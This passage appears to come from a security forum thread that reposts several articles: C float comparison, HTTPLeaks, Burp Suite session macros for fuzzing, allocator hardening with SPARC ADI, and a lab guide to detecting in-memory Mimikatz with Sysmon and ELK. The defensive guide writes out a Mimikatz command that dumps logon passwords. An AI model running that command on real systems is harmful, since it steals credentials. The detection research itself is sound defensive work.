  13. Comparing Floating Point Numbers in C/C++ Published September 2nd, 2017by Elliot Chance Comparing floating point numbers for equality can be problematic. It’s difficult because often we are comparing small or large numbers that are not represented exactly. There is also issues with rounding errors caused by not being able to represent and exact value. Rather than doing a strict value comparison (==), we treat two values as equal if there values are very close to each other. So what does “very close" mean? Well to answer that we have to take a look at how the numbers are represented in memory. Here is an example 32bit float: And here is the layout of a double precision (64bit) float: The number of bits in the fraction can be thought of as the number of significant bits (or, accuracy) of the number. We do not want to use all of the fraction bits otherwise we would be doing a strict comparison, but we will use most. For both sized float types I will use 4 less significant bits: #define INT64 52 - 4 #define INT32 23 - 4 We will use this to calculate the epsilon (the small difference that is still considered equal). However, we have to be careful that the number of bits that we use to calculate the epsilon is based on the smallest precision value in the comparison. For example is we compare a 32bit float with a 64bit float we must use only the precision of the 32bit float. For this was can use a macro: #define approx(actual, expected) approxf(actual, expected, \ sizeof(actual) != sizeof(expected) ? INT32 : INT64) There are two more gotchas: Zero is a special case because the epsilon would also be zero causing an exact comparison. So we need to treat this as a separate case. Non-rational numbers, such as NaNs and infinities are never equal to each other in any combination. If either side is non-rational the comparison is never equal. static int approxf(double actual, double expected, int bits) { // We do not handle infinities or NaN. if (isinf(actual) || isinf(expected) || isnan(actual) || isnan(expected)) { return 0; } // If we expect zero (a common case) we have a fixed epsilon from actual. If // allowed to continue the epsilon calculated would be zero and we would be // doing an exact match which is what we want to avoid. if (expected == 0.0) { return fabs(actual) < (1 / pow(2, bits)); } // The epsilon is calculated based on significant bits of the actual value. // The amount of bits used depends on the original size of the float (in // terms of bits) subtracting a few to allow for very slight rounding // errors. double epsilon = fabs(expected / pow(2, bits)); // The numbers are considered equal if the absolute difference between them // is less than the relative epsilon. return fabs(actual - expected) <= epsilon; } You can find the full commented solution as part of the test suite in the c2go project. Thank you for reading. I'd really appreciate any and all feedback, please leave your comments below or consider subscribing. Happy coding. Sursa: https://elliot.land/post/comparing-floating-point-numbers-in-c-c
  14. Black Hat Publicat pe 31 aug. 2017 A processor is not a trusted black box for running code; on the contrary, modern x86 chips are packed full of secret instructions and hardware bugs. In this talk, we'll demonstrate how page fault analysis and some creative processor fuzzing can be used to exhaustively search the x86 instruction set and uncover the secrets buried in your chipset. Full Abstract:https://www.blackhat.com/us-17/briefi... Download PDF: https://www.blackhat.com/docs/us-17/thursday/us-17-Domas-Breaking-The-x86-Instruction-Set-wp.pdf
      • 5
      • Upvote
      • Like
  15. Nytro

    HTTPLeaks

    HTTPLeaks What is this? This project aims to enumerate all possible ways, a website can leak HTTP requests. In one single HTML file. See the file leak.html (raw text version) in the root of this repository. What is it for? You can use this to test your browser for CSP leaks, your web-mailer for HTTP leaks and everything else that is not supposed to send HTTP requests to where the sun won't shine. With "HTTP Leak", we are essentially referring to a situation, where a certain combination of HTML elements and attributes cause a request to an external resource to be fired - when it should not. Think, for example, of the body of an HTML mail where a HTTP Leak would tell someone out there that you just read that mail. Not always bad - but almost never good. Or think about web proxies. Those tools try to show you a website from a different domain to offer what they call "anonymity". Of course they have to also rewrite all HTML elements and attributes that fetch resources via HTTP (or alike) and if they forget something, the so called "anonymity" is gone. And, since no one really knows anymore what elements and attributes can request external resources, we decided to create this project to keep track on that. And now? The HTML will be extended as soon as we learn about a new leak, pull requests with additional exotic sources for HTTP leaks are very welcome! Further welcome are ideas of how else this content could be presented (JSON, HTML, XML, ...). Acknowledgements Thanks @hasegawayosuke, @masa141421356, @mramydnei, @avlidienbrunn , @orenhafif, @freddyb, @tehjh, @webtonull, @intchloe, @Boldewyn and many others for adding content and smaller fixes here and there! Sursa: https://github.com/cure53/HTTPLeaks
  16. Automating Web Apps Input fuzzing via Burp Macros Posted on September 3, 2017 by Samrat Das Hi Readers, This article is about Burp Suite Macros which helps us in automating efforts of manual input payload fuzzing. While it may be know to many testers, this article is written for those who are yet to harness the power of burp suite’s macro automation. In my penetration testing career so far, while performing fuzzing of parameters and page fields in web applications, I did encounter some challenges relating to session handling. In multiple cases, the application used to terminate the session being used for testing, this either happened due to some security countermeasures ( for example: getting unsafe input, the session used to get logged out) or in other cases, the say the burp spider/ crawler used to fuzz the logout page parameters and terminate the session. In such cases, further scans, probes and requests becomes unproductive. Since you have to perform a re login and establish the session of the application. I used to do this manually and it was a bit of cumbersome. While trying to find a workaround, I was going through the Burp Suite functions and based on my curiosity, I noticed Burp’s session handling functionality. After probing around the options, I came to the idea backed by some on line research that Burp takes care of the above challenges with some rule based macros. In simple words, say if fuzzing parameters leads to termination of session, Burp can auto login the app with the credentials, and continue scanning and crawling itself. Things needed: 1 I used burp’s free version (1.7.21 free) 2 Any website which has session handling ( I am showing using the classic demo.testfire.net) Step 1: This is the website I am showing which has a login feature: Vulnerable Website Step 2: At this point, I am simply keeping the interception off in burp suite and putting the credentials here to perform a login. Login Page Step 3: Here we enter the logged in page of the website: Login field values Step 4: Now in order to test the session handling, we can send this page request to burp’s repeater tab and by removing the cookies have a look if the session is terminated due to session breaking. Request using repeater Step 5: We can see that the page session is working since we have a proper session. Let’s try to remove the cookies and test again Repeater Tab Step 6: As we can see, the session gets logged out and we need to login back again to continue testing. Session Terminated Step 7: Now comes to the rescue- Burp Macros. Navigate to : Project Options -> Sessions -> Session Handling Rules Setting up Macro Step 8: Here we can see that there is a default rule – Use cookies from Burp’s cookie jar. Burp Cookie Jar Step 9: Click add button to create a new rule. Adding rule for macro Step 10: Put a rule description which suits you and under rule actions, select “Check session is valid” Setting burp rule description Step 11: Once you click OK, the session handling editor will fire up which will show the default: Issue current request. Leave as it is and scroll down to “if session is invalid, perform the following action” Rule Configuration Rule Configuration Setting Step 12: Tick the if session invalid and click on add macro. At this point, you will get a Macro Recorder which has all the proxy history. Click and select the page which has the login credentials and performs a login. Click ok Step 13: Once you click ok, the Macro editor will fire up and you can name it with a custom name, as well as have options to simulate the macro, re-record, re-analyze. Macro Recorder Step 14: Before to running a test, configure the parameters to identify if burp has captured the test parameters correctly. Macro Recorder Parameter Check Step 15: Since here all is set, we can perform a run of test macro post click ok. Step 16: Now click on final scope and set the URL Scope to all urls / suite scope/ custom scope to guide the macro where to run. Step 17: I leave it include all URLs here. Let’s now head over to repeater again to test our macro. Scope setting for macro Step 18: Take a look, we are trying to access the main page without cookies in repeater tab: Step 19: Once we hit go, the cookies will automatically get added to the request and the page will load up! Tampering cookie value to check session Macro executed Macro executed with cookie added So that’s it. It’s a sweet and simple way to show how burp is useful for creating session based rules and macros. We can simply fuzz the input fields with our test payloads to check for vulnerabilities such as XSS, SQLi, IDOR etc. Even if the application gets timed out due to intermediate inactivity or protects session against junk inputs while automated scanning or manual testing, such macros will help you execute the recorded action and log you back inside the app! You can explore it further to use cookie jar/ burp extender and lots of other option! Happy experimenting! Sursa: http://blog.securelayer7.net/automating-web-apps-input-fuzzing-via-burp-macros/
      • 1
      • Upvote
  17. Thursday, December 22, 2016 Hardening Allocators with ADI Memory allocators handle a crucial role in any modern application/operating system: satisfy arbitrary-sized dynamic memory requests. Errors by the consumer in handling such buffers can lead to a variety of vulnerabilities, which have been regularly exploited by attackers in the past 15 years. In this blog entry, we'll look at how the ADI (Application Data Integrity) feature of the new Oracle M7 SPARC processors can help in hardening allocators against most of these attacks. A quick memory allocator primer Writing memory allocators is a challenging task. An allocator must be performant, limit fragmentation to a bare minimum, scale up to multi-thread applications and handle efficiently both small and large allocations and frequent/unfrequent alloc/free cycles. Looking in depth at allocator designs is beyond the scope of this blog entry, so we'll focus here on only the features that are relevant from an exploitation (and defense) perspective. Modern operating systems deal with memory in page-sized chunks (ranging from 8K up to 16G on M7). Imagine an application that needs to store a 10 characters string: handing out a 8K page is certainly doable, but is hardly an efficient way to satisfy the request. Memory allocators solve the problem by sitting between the OS physical page allocator and the consumer (being it the kernel itself or an application) and efficiently manage arbitrary sized allocations, dividing pages into smaller chunks when small buffers are needed. Allocators are composed of three main entities: live buffers: a chunk of memory that has been assigned to the application and is guaranteed to hold at least the amount of bytes requested. free buffers: chunks of memory that the allocator can use to satisfy an application request. Depending on the allocation design, these are either fixed-size buffers or buffers that can be sliced in smaller portions. metadata: all the necessary information that the allocator must maintain in order to efficiently work. Again, depending on the allocator design, this information might be stored within the buffer itself (e.g. Oracle Solaris libc malloc stores most of the data along with the buffer) or separately (e.g. Oracle Solaris umem/kmem SLAB allocator keeps the majority of the metadata into dedicated structures placed outside the objects) Since allocators divide a page in either fixed-size or arbitrary-size buffers, it's easy to see that, due to the natural flow of alloc/free requests, live buffers and free buffers end up living side by side in the linear memory space. The period that goes from when a buffer is handed out to an application, up until is freed is generally referred to as the buffer lifetime. During this period, the application has full control of the buffer contents. After this period, the allocator regains control and the application is expected to not interfere. Of course, bugs happen. Bugs can affect both the application working set of buffers or the allocator free set and metadata. If we exclude allocator intrinsic design errors (which, for long existing allocators, due to the amount of exercise they get, are basically zero), bugs always generate from the application mishandling of a buffer reference, so they always happen during the lifetime of a buffer and originate from a live buffer. It's no surprise that live buffer behavior is what both attackers and defenders start from. Exploitation vectors and techniques As we said, bugs originate from the application mishandling of allocated buffers: mishandling of buffer size: the classic case of buffer overflow. The application writes past the buffer boundaries into adjacent memory. Because buffers are intermixed with other live buffers, free buffers and, potentially, metadata, each one of those entities becomes a potential target and attackers will go for the most reliable one. mishandling of buffer references: a buffer is relinquished back to the allocator, but the attacker still holds a reference to it. Traditionally, these attacks are known as use after free (UAF), although, since this is an industry that loves taxonomies, it's not uncommon to see them further qualified as use after realloc (the buffer is reallocated, but the attacker is capable of unexpectedly modifying it through the stale reference) and double free (the same reference is passed twice to the free path). Sometimes an attacker is also capable of constructing a fake object and passing it to a free call, for example if the application erroneously calls free of a buffer allocated onto the stack. The degree of exploitability of these vulnerabilities (if we exclude the use after realloc case, which is application-specific) varies depending on what the allocator does during the free path and how many consistency/hardening checks are present. With the notable exception of double free and "vanilla" use after free, both the above classes are extremely hard to detect at runtime from an allocator perspective, as they originate (and potentially inflict all the necessary damage) during the object lifetime and the allocator has little to none practical control on the buffer. For this reason, the defense focus has been on the next best thing when bug classes cannot be eradicated: hamper/mitigate exploitation techniques. Over the years (and at various degrees in different allocators) this has taken the form of: entrypoint checks: add consistency check at the defined free and alloc entrypoints. As an example, an allocator could mark into the buffer associated metadata (or poison the buffer itself) that the buffer has been freed. It would then be able to check this information whenever the free path is entered and a double free could be easily detected. Many of the early days techniques to exploit heap overflows (~2000, w00w00 , PHRACK57 MaXX's and anonymous' articles) relied on modifying metadata that would then be leveraged during the free path. Over time, some allocators have added checks to detect some of those techniques. design mitigations: attackers crave for control of the heap layout: in what sequence are buffer allocated, where are they placed, how can a buffer containing sensitive data be conveniently allocated in a specific location. Allocators can introduce statistical mitigations to hamper some of the techniques to achieve this level of control. As an example, free object selection can be randomized (although it ends up being pretty ineffective against a variety of heap spraying techniques and/or if the attacker has quite some control on the allocation pattern), free patterns can be modified (Microsoft IE Memory Protector) or sensitive objects can be allocated from a different heap space (dedicated SLAB caches, Windows IE Isolated Heap, Chrome PartitionAlloc, etc). The bottom line goal of these (and other) design approaches is to either reduce the amount of predictability of the allocator or increase the amount of precise control that the attacker needs to have in order to create the successful heap layout conditions to exploit the bug. Of course, more invasive defenses also exist, but they hardly qualify for large scale application, as users tend to (rightfully) be pretty concerned about the performance of their applications/operating systems. This becomes even more evident when we compare the amount of defenses that are today enabled and deployed at kernel level versus the amount of defenses enabled at user level (and in browsers): different components have different (and varying) performance requirements. The practical result is that slab overflows are today probably the most reliable type of vulnerability at kernel level and use after free are a close second in kernel land, while extensively targeted in user land, with only the browsers being significantly more hardened than other components. Extensive work is going on towards automating and abstracting the development of exploits for such bugs (as recently presented by argp at Zeronights), which makes the design of efficient defenses even more compelling. ADI to the rescue Enter the Oracle SPARC M7 processor and ADI, Application Data Integrity, that were both unveiled at HotChips and Oracle OpenWorld 2014. At its core, ADI provides memory tagging. Whenever ADI is enabled on a page entry, dedicated non-privileged load/store instructions provide the ability to assign a 4-bit version to each 64-byte cacheline that is part of the page. This version is maintained by the hardware throughout the entire non-persistent memory hierarchy (basically, all the way down to DRAM and back). The same version can then be mirrored onto the (previously) unused 4 topmost bits of each virtual address. Once this is done, each time a pointer is used to access a memory range, if ADI is enabled (both at the page and per-thread level), the tag stored in the pointer is checked by the hardware against the tag stored in the cache line. If the two match, all is peachy. If they don't, an exception is raised. Since the check is done in hardware, the main burden is at buffer creation, rather than at each access, which means that ADI can be introduced in a memory allocator and its benefit extended to any application consuming it without the need of extra instrumentation or special instructions into the application itself. This is a significant difference from other hardware-based memory corruption detection options, like Intel MPX, and minimizes the performance impact of ADI while maximizing coverage. More importantly, this means we finally have a reliable way to detect live object mishandling: the hardware does it for us. [ADI versioning at work. Picture taken from Oracle SPARC M7 presentation] 4 bits allow for a handful of possible values. There are two intuitive ways in which an ADI-aware allocator can invariantly detect a linear overflow from a buffer/object to the adjacent one: introduce a redzone with a special tag tag differently any two adjacent buffers Introducing a redzone means wasting 64-byte per allocation, since 64-byte is the minimum granularity with ADI. Wasted memory scales up linearly with the number of allocations and might end up being a substantial amount. Also, the redzone entry must be 64-byte aligned as well, which practically translates in both buffers and the redzone to be 64-byte aligned. The advantage of this approach is that is fairly simple to implement: simply round up every allocation to 64-byte and add an extra complimentary 64-byte buffer. For this reason, it can be a good candidate for debugging scenarios or for applications that are not particularly performance sensitive and need a simple allocation strategy. For allocators that store metadata within the buffer itself, this redzone space could be used to store the metadata information. Mileage again varies depending on how big the metadata is and it's worth to point out that general purpose allocators usually strive to keep it small (e.g. Oracle Solaris libc uses 16 bytes for each allocated buffer) to reduce memory wastage. Tagging differently two adjacent objects, instead, has the advantage of reducing memory wastage. In fact, the only induced wastage is the one from forcing the alignment to a 64-byte boundary. It also requires, though, to be able to uniquely pick a correct tag value at allocation time. Object-based allocators are a particularly good fit for this design because they already take some of the penalty for wasted memory (and larger caches are usually already 64-bit aligned) and their design (fixed size caches divided in a constant number of fixed size objects) allows to uniquely identify objects based on their address. This provides the ability to alternate between two different values (or range of values, e.g. odd/even tags, smaller/bigger than a median) based on the ibject position. For other allocators, the ability to properly tag the buffer depends on whether there is enough metadata to learn about the previous and next object tag. If there is, then this can still be implemented, if there isn't, one might decide to employ a statistical defense by randomizing the tag (note that the same point applies also to object-based allocators when we look at large caches, where effectively only a single object is present per cache). A third interesting property of tagging is that it can be used to uniquely identify classes of objects, for example free objects. As we discussed previously, metadata and free objects are never the affector, but only the affectee of an attack, so one tag each suffices. The good side effect of devoting a tag each is that the allocator now has a fairly performant way to identify them and issues like double-frees can be easily detected. In the same way, it's also automatically guaranteed that a live object will never be able to overflow into metdata or free objects, even if a statistical defense (e.g. tag randomization) is employed. Use-after-realloc and arbitrary writes ADI does one thing and does it great: provides support to implement an invariant to detect linear overflows. Surely, this doesn't come without some constraints (64-byte granularity, 64-byte alignment, page-level granularity to enable it, 4-bit versioning range) and might be a more or less good fit (performance and design-wise) for an existing allocator, but this doesn't detract from its security potential. Heartbleed is just one example of a linear out-of-bound access and SLAB/heap overflow fixes have been in the commit logs of all major operating systems for years now. Invariantly detecting them is a significant win. Use-after-realloc and arbitrary writes, instead, can't be invariantly stopped by ADI, although ADI can help in mitigating them. As we discussed, use-after-realloc rely on the ability, by the attacker, to hold a reference to a free-and-then-realloced object and then use this reference to modify some potentially sensitive content. ADI can introduce some statistical noise in this exploitation path, by looping/randomizing through different values for the same buffer/object. Note that this doesn't affect the invariant portion of, for example, alternate tagging in object-based allocators; it simply takes further advantage of the versioning space. Of course, if the attacker is in the position of performing a bruteforce attack, this mitigation would not hold much ground, but in certain scenarios, bruteforcing might be a limiting factor (kernel level exploitation) or leave some detectable noise. Arbitrary writes, instead, depend on the ability of the attacker to forge an address and are not strictly related to allocator ranges only. Since the focus here is the allocator, the most interesting variant is when the attacker has the ability to write to an arbitrary offset from the current buffer. If metadata and free objects are specially tagged, they are unreachable, but other live objects with the same tag might be reached. Just as in the use-afte-realloc case, adding some randomization to the sequence of tags can help, with the very same limitations. In both cases, infoleaks would precisely guide the attacker, but this is basically a given for pretty much any statistical defense. TL;DR Oracle SPARC M7 processors come with ADI, Application Data Integrity, a feature that provides memory tagging. Memory allocators can take advantage of it both for debugging and security, in order to invariantly detect linear buffer overflows and statistically mitigate against use-after-free and offset-based arbitrary writes. lazytyped at 9:35 AM Sursa: https://lazytyped.blogspot.ro/2016/12/hardening-allocators-with-adi.html?m=1
      • 1
      • Upvote
  18. Saturday, March 11, 2017 Chronicles of a Threat Hunter: Hunting for In-Memory Mimikatz with Sysmon and ELK - Part I (Event ID 7) This post marks the beginning of the "Chronicles of a Threat Hunter" series where I will be sharing my own research on how to develop hunting techniques. I will use open source tools and my own lab at home to test real world attack scenarios. In this first post, I will show you the beginning of some research I have been doing recently with Sysmon in order to hunt for when Mimikatz is reflectively loaded in memory. This technique is used to dump credentials without writing the Mimikatz binary to disk. Invoke-Mimikatz.ps1 Author: Joe Bialek, Twitter: @JosephBialek Mimikatz Author: Bejamin Delpy 'gentilkiwi', Twitter: @gentilkiwi This first part will cover how we could approach the detection of in-memory Mimikatz by focusing on the specific Windows DLLs that it needs to load in order to work (no matter what process it is running from and if it touches disk or not). I will compare the results when Mimikatz is run on disk and in memory to see the specific DLLs needed on both scenarios.There is an article that talks about this same approach, but I feel that it could be improved upon. It is still a good read, and I love the approach. You can read it here. Requirements: Sysmon installed (I have version 6 installed) Winlogbeat forwarding logs to an ELK Server I recommend to read my series "Setting up a Pentesting.. I mean, a Threat Hunting Lab" specially parts 5 & 6 to help you set up your environment. Mimikatz binary (Version 2.1 20170305) Invoke-Mimikatz notepad++ - Great local editor for your Sysmon configs. Mimikatz Overview Mimikatz is a Windows x32/x64 program coded in C by Benjamin Delpy (@gentilkiwi) in 2007 to learn more about Windows credentials (and as a Proof of Concept). There are two optional components that provide additional features, mimidrv (driver to interact with the Windows kernal) and mimilib (AppLocker bypass, Auth package/SSP, password filter, and sekurlsa for WinDBG). Mimikatz requires administrator or SYSTEM and often debug rights in order to perform certain actions and interact with the LSASS process (depending on the action requested) [Source]. Mimikatz comes in two flavors: x64 or Win32, depending on your windows version (32/64 bits). Win32 flavor cannot access 64 bits process memory (like lsass), but can open 32 bits minidump under Windows 64 bits. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. Mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets. [Source] In-Memory Mimikatz What gives Invoke-Mimikatz its “magic” is the ability to reflectively load the Mimikatz DLL (embedded in the script) into memory [Source]. However, it needs other native Windows DLLs loaded on disk in order to do its job. Event ID 7: Image loaded The image loaded event logs when a module is loaded in a specific process. This event is disabled by default and needs to be configured with the –l option. It indicates the process in which the module is loaded, hashes and signature information. The signature is created asynchronously for performance reasons and indicates if the file was removed after loading. This event should be configured carefully, as monitoring all image load events will generate a large number of events. [Source] Getting ready to hunt for Mimikatz Getting a Sysmon Config ready The main goal is to monitor for "Images Loaded" when Mimikatz gets executed. However, first we have to make sure that we understand what "normal" looks like. Therefore, the first think that I recommend to do is to monitor images getting loaded by the process which will be executing Mimikatz in its two forms (the Mimikatz binary and Invoke-Mimikatz). We will test Mimikatz on disk first. This first step of logging Images loaded by the process executing mimikatz will be more helpful when we test the Invoke-Mimikatz script, but it is a good exercise for you to understand the testing methodology. The process that I used for this first test was "PowerShell.exe" so I created a basic Sysmon configuration to only log images loaded by this process. It is available in github as shown below. <Sysmon schemaversion="3.30"> <!-- Capture all hashes --> <HashAlgorithms>md5</HashAlgorithms> <EventFiltering> <!-- Event ID 1 == Process Creation. --> <ProcessCreate onmatch="include"/> <!-- Event ID 2 == File Creation Time. --> <FileCreateTime onmatch="include"/> <!-- Event ID 3 == Network Connection. --> <NetworkConnect onmatch="include"/> <!-- Event ID 5 == Process Terminated. --> <ProcessTerminate onmatch="include"/> <!-- Event ID 6 == Driver Loaded.--> <DriverLoad onmatch="include"/> <!-- Event ID 7 == Image Loaded. --> <ImageLoad onmatch="include"> <Image condition="end with">powershell.exe</Image> </ImageLoad> <!-- Event ID 8 == CreateRemoteThread. --> <CreateRemoteThread onmatch="include"/> <!-- Event ID 9 == RawAccessRead. --> <RawAccessRead onmatch="include"/> <!-- Event ID 10 == ProcessAccess. --> <ProcessAccess onmatch="include"/> <!-- Event ID 11 == FileCreate. --> <FileCreate onmatch="include"/> <!-- Event ID 12,13,14 == RegObject added/deleted, RegValue Set, RegObject Renamed. --> <RegistryEvent onmatch="include"/> <!-- Event ID 15 == FileStream Created. --> <FileCreateStreamHash onmatch="include"/> <!-- Event ID 17 == PipeEvent. --> <PipeEvent onmatch="include"/> </EventFiltering> </Sysmon> view raw PowerShell_ImagesLoaded.xml hosted with ❤ by GitHub Download and save the Sysmon config in a preferred location of your choice as shown in Figure 1 below. Figure 1. Saving custom sysmon config. Update your Sysmon rules configuration. In order to do this, make sure you run cmd.exe as administrator, and use the the configuration you just downloaded as shown in figure 3 below. Run the following commands: Sysmon.exe -c [Sysmon config xml file] Then, confirm if your new config is running by typing the following: sysmon.exe -c (You will notice that the only things being logged will be Images loaded by "PowerShell" as shown in figure 3 below.) Figure 2. Running cmd.exe as an Administrator. Figure 3. Updating your Sysmon rules configuration. You should be able to open your Event Viewer and verify that the last event logged by Sysmon was Event ID 16 which means that your Sysmon config state changed. You should not get any other events after that unless you launch PowerShell. If so, try to update your config one more time as shown in figure 3 above. Figure 4. Checking Sysmon logs with the Event Viewer console. Delete/Clean your Index If you open your Kibana console and filter your view to show only Sysmon logs, you will see old records that were sent to your ELK server before updating your Sysmon config. In order to be safe and make sure you don't have old Images loaded that might interfere with your results, I recommend to delete/clear your Index by running the following command as shown in figure 6 below: curl -XDELETE 'localhost:9200/[name of your index]?pretty' If you are using my Logstash configs, an index gets created as soon as it passes data to your elasticsearch. Figure 5. Old Sysmon logs displayed on your Kibana console. Figure 6. Clearing contents of your main Index. (Clearing Logs) Now, if you refresh your view (filtering only to show Sysmon logs again), you should not see anything unless you execute PowerShell. Figure 7. No Sysmon logs in ElasticSearch yet. Create a Visualization for "ImageLoaded" events I do this so that I can group events and visualize data properly instead of using the event viewer. To get started do the following: Click on "Visualize"on the left panel Select "Data Table" as your visualization type Figure 8. Creating a new visualization. Data Table type. Select the index you want to use (In this case, the only one available is Winlogbeat) Figure 9. Selecting the right index for the visualization. As shown in figure 10 below: Select the "Split Rows" bucket type Select the aggregation type "Terms" Select the data field for the visualization (event_data.ImageLoaded.keyword) By default data will be ordered "Descending". Set the number of records to show to "200" (We do this to make sure we show all the modules being loaded) Figure 10. Creating visualization. Click on "options" and set the "Per Page" value to show 20 results per page. Remember we set this visualization to show the top 200 records in figure 10 above, and now to show 20 records per page. If you end up having 10 pages full of records, then you might want to increase the number of records to show more than 200 since you might not be showing all the results. Figure 11. Setting visualization options. Give a name to your new visualization and save it. Figure 12. Saving visualization. Figure 13. Saving visualization. Creating a simple dashboard to add our visualization To get started do the following: Click on "Dashboard" on the left panel. (Figure 14) Click on "Add" on the options above your Kibana search bar. (Figure 15) Figure 14. Creating a new dashboard. Select the visualization we just created for Images loaded. This will add the visualization to your dashboard. Figure 15. Adding our new visualization. Figure 16. Visualization added to our new dashboard. Save your new dashboard: Click on "Save" between the options "Add" and "Open". Give your dashboard a name and save it. Figure 17. Saving new dashboard. Figure 18. Saving new dashboard. Testing/Logging Images loaded by PowerShell As I stated before, if we want to detect anomalies, we have to first understand what normal looks like. Therefore, in this section, we will find out what images get loaded when PowerShell is launched in order to start creating a baseline. To get started, launch PowerShell and close it. Figure 19. Opening PowerShell. Next, refresh your dashboard by clicking on the magnifier glass icon located to the right of the Kibana Search bar. You will see that there are several images/modules that were loaded when PowerShell executed as shown in figure 20 below. Figure 20. Logging Images loaded by PowerShell. If we go to our last page, page #4, we can see that there are 12 results on a 20 per page setup. This means that we have 3 pages with 20 records and 1 with 12. Therefore, we can say that PowerShell loads 72 images when we open it and close it. Figure 21. Logging Images loaded by PowerShell. Now in order to verify that PowerShell loads 72 images most of the time, I opened and closed PowerShell 4 times as shown in figure 22 below. Figure 22. Opening and closing PowerShell 4 times. Once you refresh your dashboard again, you will see that we have the same images being loaded and the number (Count) of images increased by 4. We now see a count of 5 for every single unique Image loaded. A total again of 72 unique images loaded 5 times. Until this point, it is clear that PowerShell only loads 72 images when it starts for basic functionalities (Default). We are now ready to test Mimikatz on disk. Figure 23. Images loaded by PowerShell after being opened and closed 4 more times. Figure 24. Images loaded by PowerShell after being opened and closed 4 more times. Detecting Mimikatz on Disk Download the latest Mimikatz Trunk Our first test will be running the Mimikatz binary available here as shown in figure 25. Figure 25. Downloading Mimikatz binaries. Download and save your Mimikatz folder in a preferred location of your choice as shown in figure 26 below. I show you this because it is important that you remember the right path of the mimikatz binary you will use for the first test. We will need the path to update our sysmon config and log the images loaded by the mimikatz binary. Figure 26. Downloading Mimikatz binaries. Edit and Update your Sysmon config Add another rule to the configuration we used earlier. Open the config with notepad++ and add another "Image" rule specifying the path to mimikatz.exe as shown in figure 28. Figure 27. Editing our Sysmon config. Figure 28. Editing our Sysmon config. Open cmd.exe as administrator and run the following commands as shown in figure 29 below: sysmon.exe -c [edited sysmon xml file] Then, confirm that the changes were applied by running the following command: sysmon.exe -c (You will see that our new rule now shows up below our PowerShell one) Figure 29. Updating Sysmon rule configuration. TIP: Extend the Time Range of your Dashboard Remember that by default your Dashboard is set to show the last 15 minutes of data stored in elasticsearch. I always extend my time range to 15 or 30 minutes to make sure I still show logs that were captured more than 15 minutes ago (That is sometimes how much time it takes me to do all the extra stuff to get ready or I just simply get distracted). It depends on how much time you take between each update or change you make to your config or strategy. You just want to make sure that your time range is right in order to capture all your results. Figure 30. Extending the time range of your dashboard. Running Mimikatz on Disk Now that we have everything ready, lets first run PowerShell as Administrator. If you refresh your dashboard, the count of almost every single image/module will be increased by 1 as shown in figure 32 below. Figure 31. Running PowerShell as Administrator. Figure 32. PowerShell opened as Administrator. Now, it is really important to make sure we do not load extra images that could be mixed with modules loaded by the Mimikatz binary. Before running Mimikatz, I wanted to show you what happens when you fat finger a command in PowerShell. Yes, it actually loads an image named diasymreader.dll as shown in figure 34 below. Therefore, if you fat finger the wrong arguments while executing Mimikatz, make sure you do not count diasymreader.dll as part of your results. Figure 33. Testing wrong arguments in PowerShell One important thing also to mention is that PowerShell loads netutils.dll when the console closes. Therefore, since we are not closing our PowerShell console yet, you will still see netutils.dll with a count of 5 and not 6. We are using our High integrity PowerShell process to run mimikatz so we cant close it yet. Figure 34. Extra image loaded by PowerShell after executing wrong arguments. It is time to test our Mimikatz binary. Change your directory to the one where the Mimikatz binary is stored (I used the x64 one). Launch the following commands and close your PowerShell console: .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit Figure 35. Running Mimikatz on disk. Next, refresh your dashboard. You will see that our count for every single image on page 1 increased by 1. That means that Mimikatz also loads those images when it executes. This is an important first finding because those first images might not be unique enough to be used to fingerprint Mimikatz. Figure 36. Images loaded after executing Mimikatz on disk. If you go to page #4, you will see that we start to see a few unique ones loaded by mimikatz (remember that diasymreader.dll was not loaded by mimikatz). Also, you can see that image mimikatz.exe was loaded 4 times and by PowerShell of course. Figure 37. Images loaded after executing Mimikatz on disk. If you go to the next page, page #5, you can see the last unique images loaded by mimikatz. Now this is good for this exercise because we can at least have a basic understanding of the, so far, unique images being loaded by mimikatz when executed on disk. Figure 38. Images loaded after executing Mimikatz on disk. What if I want to see images loaded by Mimikatz only? What I like about using Kibana is that I can filter out or group data records with unique characteristics. Lets say you want to select only images loaded by Mimikatz.exe. We will have to create an extra visualization and add it to our dashboard. You could also type a query on the Kibana Search bar to accomplish that, but I prefer to have an extra visualization that I can interact with too (good exercise). As explained before, in order to create a visualization, click on Visualize on the left panel, and it will automatically take you to edit the only visualization that we have in our dashboard. Next, click on "New" to create a new visualization as shown in figure 39 below. Figure 39. Creating a new visualization. Select Data Table for the visualization type and Winlogbeat for the index. Figure 40. Creating a new visualization. For this visualization, do the following: Set the field to event_data.Image.keyword Give it a name and save it Figure 41. Creating a new visualization. Figure 42. Saving the new visualization. Click on Dashboard on the left console, and add the new visualization to your dashboard as shown in figure 43 below. Figure 43. Adding visualization to dashboard. You will see that now we have better numbers to show per Image (PowerShell.exe & Mimikatz.exe). You can see that PowerShell loaded 437 images overall. That makes sense because we know that it loads 72 images every time it opens and closes, and we used it 6 times which gives us 432 images. We also made PowerShell load one extra image when I showed you what happened when you fat finger a command so with that one we would have 433. Plus the other 4 images named mimikatz.exe that were loaded when we used PowerShell to execute the Mimikatz binary. All that gives us our 437 images loaded as shown in figure 44. Figure 44. New visualization added to dashboard. Then, what you can do with this new visualization is to click on the Image "C:\Tools\mimikatz_trunk\x64\mimikatz.exe" and it will automatically create a filter to show only the images loaded by your selection as shown in figure 46 below. Figure 45. Images loaded only by PowerShell and Mimikatz. Figure 46. Images loaded only by Mimikatz. Figure 47. Images loaded only by Mimikatz. You can also download all the results of the visualization Images_Loaded by clicking on the option "Formatted" below the data table results.That will allow you to export all the results in a CSV format. Save it and open it to highlight a few things. Figure 48. Exporting results of images loaded in a CSV format. Figure 49. Saving CSV file. Open the file and highlight the unique images that were loaded by Mimikatz when it was run on disk. That will help you to document your results. So far, we can consider the highlighted images to be our initial fingerprint for Mimikatz. That will change of course when you start collecting modules being loaded by other programs and comparing results. Figure 50. Result of images loaded after executing Mimikatz on disk. Detecting In-memory Mimikatz Delete/Clean your Index Our next test will be launching mimikatz reflectively in memory. To get started delete/clear your index as shown in figure 51 below. Figure 51. Deleting Index. Refresh your dashboard to confirm that the index was deleted/cleared. Figure 52. Empty Dashboard. Getting ready to run Invoke-Mimikatz Invoke-Mimikatz is not updated when Mimikatz is, though it can be (manually). One can swap out the DLL encoded elements (32bit & 64bit versions) with newer ones. Will Schroeder 